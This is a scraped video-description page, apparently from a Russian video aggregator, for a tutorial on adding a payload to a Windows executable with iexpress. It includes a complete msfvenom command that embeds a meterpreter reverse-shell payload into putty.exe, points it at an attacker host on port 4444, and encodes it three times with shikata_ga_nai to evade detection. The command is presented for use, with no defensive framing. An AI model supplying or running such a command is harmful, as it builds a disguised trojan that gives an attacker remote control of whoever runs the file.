Add Payload to Executable (Windows)

Опубликовано: 01 Апрель 2022
на канале: CodeOnBy
2,784
46

In this video we'll see how to add a payload to an executable on Windows using iexpress. This will create a win32 self extracting package.
You can use this method to combine two executables or add a Python script to run parallel to the executable itself.

To create standalone Python executables:
   • Convert Python 3 to Executable using ...  
For Python client/server sciprts:
https://codeonby.com/2019/12/23/pytho...

Alternatively, this can be done with metasploit using the following command under Linux:
msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=ip.address lport=4444 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o puttyX.exe


Смотрите видео Add Payload to Executable (Windows) онлайн без регистрации, длительностью часов минут секунд в хорошем качестве. Это видео добавил пользователь CodeOnBy 01 Апрель 2022, не забудьте поделиться им ссылкой с друзьями и знакомыми, на нашем сайте его посмотрели 2,78 раз и оно понравилось 4 людям.